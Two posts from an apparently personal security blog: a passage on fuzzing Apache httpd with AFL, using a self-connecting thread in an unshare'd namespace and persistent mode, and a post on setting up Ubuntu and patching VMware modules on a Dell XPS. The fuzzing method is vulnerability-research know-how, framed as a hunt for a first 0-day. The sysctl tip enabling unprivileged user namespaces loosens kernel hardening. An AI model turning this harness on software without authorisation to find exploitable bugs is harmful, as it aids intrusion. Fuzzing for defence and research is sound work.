Now, if you downloaded and unpacked everything, you should have a similar output from the ls -l command:
drwxr-xr-x 28 javier javier  4096 Apr  9 23:12 apr-1.5.2
drwxr-xr-x 20 javier javier  4096 Apr  9 23:13 apr-util-1.5.4
-rwxr-xr-x  1 javier javier  1445 May  6 20:56 compile_httpd_with_flags.sh
drwxr-xr-x 11 javier javier  4096 Apr 29 01:22 httpd-2.4.x
drwxr-xr-x 14 javier javier  4096 Apr  9 23:14 nghttp2-1.21.0
drwxr-xr-x  9 javier javier 12288 Apr  9 22:53 pcre-8.40

I made the following file to compile and link it all since I found myself often changing compiler flags and it was too time-consuming to compile each dependency one by one with its own flags. Get it with:
wget https://gist.githubusercontent.com/n30m1nd/14418fd425a3b2d14b64650710fae301/raw/e1cff738eb1ffaa55cb8a1a66bb1a2b06ed7f97e/compile_httpd_with_flags.sh

Before editing any files yet, let's run the bash script and check that we can compile everything cleanly without any missing dependencies whatsoever:

CC="clang" CXX="clang++" PREFIX="/usr/local/apache_clean_test/" ./compile_httpd_with_flags.sh
Please see the next asciinema for reference of a nice compilation run.

Fuzzing Apache with AFL through an input file

As you might know by now, AFL in its basic usage feeds a file into the target program through its "argv" array in the following form:
afl-fuzz -i testcases/ -o session_1/ -m none -t 2000 -- ./victim -d -v -f @@
The problem with Apache is that it doesn't have such functionality so we will have to patch it our own way.

Patching Apache ... Apatching

Taking into account the aforementioned problem, we need to write some lines into Apache's main.c file to make it able to read its input from a file.
You can patch Apache with the following patch file here. Now apply it by cd'ing into the base path of Apache httpd's source code and issuing the following command:
patch -p0 -i apatching_apache_for_AFL_fuzzing.diff
I am not going to cover the whole patch in detail but some parts are worth mentioning.

The first and only time that I have seen the following technique was by Robert Swiecki, an information security researcher at Google, when fuzzing Apache with honggfuzz. It is pretty clever and pretty obvious once you see the way it is done. It basically consists of launching a new thread inside Apache that will create a connection to the web server itself and send our fuzzed input; all of this happening within the same single process so we can get all the instrumentation data into AFL. Clever! Right?
To achieve this it uses the unshare function, which disassociates parts of this thread's context from the others without the need to create a new process. Specifically, the network and mount namespaces are separated. This is done so we can have several processes with the same settings (listening on the same loopback interface and port with the help of netIfaceUp on line 44 of the patch file, and writing logs to /tmp on line 75) running at the same time for each process we launch.

We can see that the unshare function is indirectly called on line 188, prior to firing the new thread that will receive the fuzzed input on line 189.

The process of reading a file through the "-F" switch starts on line 156 and, when the file is read into a buffer, this buffer is passed on to the function responsible for launching the new thread (line 189), which will, in turn, send the fuzzed file inside the SENDFILE function on line 119.
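
To make the idea easier to picture, here is a heavily simplified sketch of the "connect to yourself" part (illustrative only, not the code from the patch; it assumes the listener is already up on 127.0.0.1:8080 inside the process' private network namespace):

#include <arpa/inet.h>
#include <pthread.h>
#include <sys/socket.h>
#include <unistd.h>

struct fuzz_input { const char *buf; size_t len; };

static void *send_fuzzed_input(void *arg) {
    struct fuzz_input *in = arg;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = {0};
    addr.sin_family = AF_INET;
    addr.sin_port = htons(8080);
    inet_pton(AF_INET, "127.0.0.1", &addr.sin_addr);
    if (connect(fd, (struct sockaddr *)&addr, sizeof(addr)) == 0)
        write(fd, in->buf, in->len);       /* the fuzzed HTTP request */
    close(fd);
    return NULL;
}

/* Called once per fuzzing iteration with the buffer read from the -F file. */
static void fire_request(const char *buf, size_t len) {
    pthread_t t;
    struct fuzz_input in = { buf, len };
    pthread_create(&t, NULL, send_fuzzed_input, &in);
    pthread_join(&t, NULL);                /* wait until the request has been sent */
}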

Fuzzing Apache ... Fapache

Yes! We are ready now! Let's compile Apache:
CC="afl-clang" CXX="afl-clang++" PREFIX="/usr/local/apache_afl_blogpost/" ./compile_httpd_with_flags.sh
If you are familiar with AFL and how it works you probably have your own test cases to feed it with; in case you don't, the following video shows how to launch AFL and create two very simple test cases - remember that we need to be root in order to use the unshare function AND, MORE IMPORTANTLY, TO LAUNCH APACHE WITH THE "-X" FLAG AND "-m none -t 5000" FOR AFL SO IT CAN BOOT APACHE:
Well, that was not too fast, was it? 5 execs per second on my laptop... how can we speed things up a bit?

Setup part 2

Compiling afl-clang-fast

Remember we downloaded clang-4.0 and the llvm-tools before and set them in our path? This is where they come in most handy. Inside your AFL folder, navigate to llvm_mode and run make, then run sudo make install in the root folder of AFL. What we have just done is compile an experimental feature of AFL that will run a number of fuzzed inputs against a program without having to restart the whole program for each input.

Patching Apache with Persistence ... Apatchistence

Following the same dance as before, download this patch, apply it, and you're ready to fuzz!

Fuzzing Apache with AFL on Persistent mode

Let the video speak for itself but, again, remember the previously mentioned "-X" flag for the Apache server and the "-m none -t 5000" flags for AFL.

Update:

As pointed out by Robert himself, you don't need to run everything as root as I did in the examples, which obviously imposes security risks. You can make use of the following command line (this one to be run as root :P) to let non-root users make use of the unshare function:
sysctl -w kernel.unprivileged_userns_clone=1

Conclusions

We have learned how to effectively fuzz server programs such as web servers by using Robert's technique of launching a different thread and different context through the unshare function.
While relatively fast, it is not as fast as honggfuzz, which can go up to 20k iterations per second with 8 processes running. Also, after a few days of fuzzing, AFL's stability goes way down (around 50%) because of the multithreading Apache is built on, and so any reported crashes can be false positives or would need the last iterations launched, which AFL doesn't keep.

It is left as an exercise for the reader to implement in Apache a way to save the last 1k sent inputs to a file, and to think about which other ways would improve stability and/or speed. Hint: don't instrument everything.

Thanks for your time! In the meantime you can check the post I did on SensePost's blog about ptmalloc2 implementation basics.

Friday, January 27, 2017

The first step

Hello and welcome,

This blog is about the journey towards my first 0-day which, let's be honest, might never happen, but I'm sure we'll learn a lot of things along the way :)
The journey should only be considered complete when the following conditions are met:
  • Privilege escalation or,
  • Code execution
  • Involves shellcoding
  • Bypass of exploit mitigations

Intro

First things first. Setup.

So, some weeks ago, I had some problems when setting up Ubuntu 16.04 on a laptop which, at the time, I really needed to have up and running as quickly as possible. The easiest ways out would have been:

  • Reinstalling
  • Changing to another linux distro
  • Ask for a new laptop with preshipped Ubuntu
So for the first post, instead of talking about anything related to exploiting, I will start with a little story that will help you overcome all the barriers that Ubuntu 16.04 and Dell set on users who want to use their OS of choice. And before we start:

Takeaways for you, the reader

  • How to install Ubuntu 16.04 with encryption on a laptop with an SSD (NVME)
  • Know about some Ubuntu bugs that haven't got a fix
  • Know about some Ubuntu bugs that have a fix
  • How to run the latest VMWare Player on newer Kernels (4.9.5)

Here we go!

First days - Installing Ubuntu 16.04 with encryption

I was given a Dell XPS 15 shipped with Windows 10 Home. As a PC gamer I am used to having Windows and making heavy use of virtualization programs to run Linux on top of it.
But since there wasn't an easy way to set up BitLocker on Windows 10 Home and I wasn't going to play any games on this laptop, I decided to get rid of the preshipped OS and install Ubuntu on it.
So, I set the BIOS legacy boot option, insert the live Ubuntu USB, select installation, format the drive to ext4, choose encryption and... BANG! Ubuntu's standard installation won't select the right NVMe partition to write the bootloader to; it tries to write it to "/dev/nvme", which is not a real partition, and hence we face our first problem.

PROBLEM:
If we choose the standard installation with full disk encryption, the wizard won't let us choose which partition to write the bootloader to; but if we choose the alternative installation, where we can choose where to write the bootloader, it won't let us choose full disk encryption.


NVMe, UGH!

SOLUTION:
After playing around with the Ubuntu installer wizard I managed to choose the right partition to write the boot into and choose full disk encryption as well:
  1. Boot into the Live Ubuntu USB
  2. Get boot-repair
  3. Run boot-repair and set the "boot flag" on the partition you want the boot written to (in my case "/dev/nvme0n1p1")
  4. Run the installer wizard
  5. Select the alternative installation
  6. Change the partition that the boot is going to be written to
  7. Go back in the wizard and select the standard installation with full disk encryption
  8. ???
  9. Profit!

But rest not, for tragedies are about to come...

The laptop hangs up

After a day of using the laptop and in the middle of something important (for this I have to say, thank programmers for the invention of auto-saving) the whole system freezes. Nothing works. The mouse, keyboard, graphics... everything is stuck. Not even REISUB works.
After some time searching on Google and forums I stumbled upon this bug, which has been around since 2013, yet nobody has come up with any solutions.
Some people said they got it fixed by updating the kernel, so I updated the kernel to the next version (I had 4.4 at that time, so 4.5 it is).
Nothing. Same problem, plus I can't control the brightness of the screen anymore. Anything else?
Of course, keep reading!
Now I can't type the password to decrypt the disk. Although the "splash" screen is showing, there's a prompt at the top left of the screen where everything I type shows up, but it doesn't seem to be a proper shell nor the password input for decryption.
Then I rebooted, grub appeared the same way it would if you held shift at boot and, there, it did let me choose "Ubuntu" or "Advanced options". I selected "Ubuntu" and suddenly a new prompt to decrypt the disk appeared.
More Googling aaaaand... it seems that, again, it's a known bug, and I found someone else who had the same problem but, in my case, I hadn't installed any new graphics drivers.

PROBLEM:
What the hell is happening? Seriously? Everything hangs up from time to time and, sometimes, when Ubuntu manages to boot with Kernel 4.5, the graphics card seems to go really slow. The only thing we can think of is updating the Kernel and the BIOS.

FIX:
Upgrading to kernel 4.9.0 did it for me but, since I wanted to know how far I could go, I upgraded to Kernel 4.9.4 and also updated the BIOS, 'cause, why not.
If you are looking to update your Dell's XPS laptop please, refer to this link: Dell BIOS Update

No more hangs! Oh wait...

So far so good but, when trying to install VMWare, it just wouldn't compile; plus, you need GCC 6.2.0. So...

PROBLEM:
The latest VMWare will not compile on newer kernels (4.9.5). It seems the Kernel developers decided to merge the separate flags that get_user_pages took up to version 4.6 into a single flags variable in version 4.9.

(dirty) FIX:
The FIX can be found here but, since the formatting is not that good, I will paste it here for ease of copy-pasting for you, the reader:

Extract and edit
tar -xf /usr/lib/vmware/modules/source/vmmon.tar
vi vmmon-only/linux/hostif.c
 
In vmmon-only/linux/hostif.c around line 1162, change:
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
    retval = get_user_pages((unsigned long)uvAddr, numPages, 0, 0, ppages, NULL);
#else
    retval = get_user_pages(current, current->mm, (unsigned long)uvAddr,
    numPages, 0, 0, ppages, NULL);
#endif
to:
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)
    retval = get_user_pages((unsigned long)uvAddr, numPages, 0, ppages, NULL);
#else
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
        retval = get_user_pages((unsigned long)uvAddr, numPages, 0, 0, ppages, NULL);
    #else
        retval = get_user_pages(current, current->mm, (unsigned long)uvAddr,
                    numPages, 0, 0, ppages, NULL);
    #endif
#endif
Now "re-tar", extract the next file and edit:
sudo tar -cf /usr/lib/vmware/modules/source/vmmon.tar vmmon-only/
tar -xf /usr/lib/vmware/modules/source/vmnet.tar
vi vmnet-only/userif.c
In vmnet-only/userif.c, around line 113, change:
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
    retval = get_user_pages(addr, 1, 1, 0, &page, NULL);
#else
    retval = get_user_pages(current, current->mm, addr,
                1, 1, 0, &page, NULL);
#endif
to
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 9, 0)
    retval = get_user_pages(addr, 1, 0, &page, NULL);
#else
    #if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 6, 0)
        retval = get_user_pages(addr, 1, 1, 0, &page, NULL);
    #else
        retval = get_user_pages(current, current->mm, addr,
        1, 1, 0, &page, NULL);
    #endif
#endif
Now re-tar and run the VMWare installer, feed it with the right path for GCC-6.2.0 and you're done!
sudo tar -cf /usr/lib/vmware/modules/source/vmnet.tar vmnet-only/
Woo! That's it - how I got it all set up... But, in the end, I won't keep Ubuntu. I still haven't made up my mind on which Linux distribution to choose or whether to keep Windows 10 (win-afl maybe?).

Next post

Stay tuned! More to come! Some fuzzing and analyzing crashes found while doing so.

Happy learning!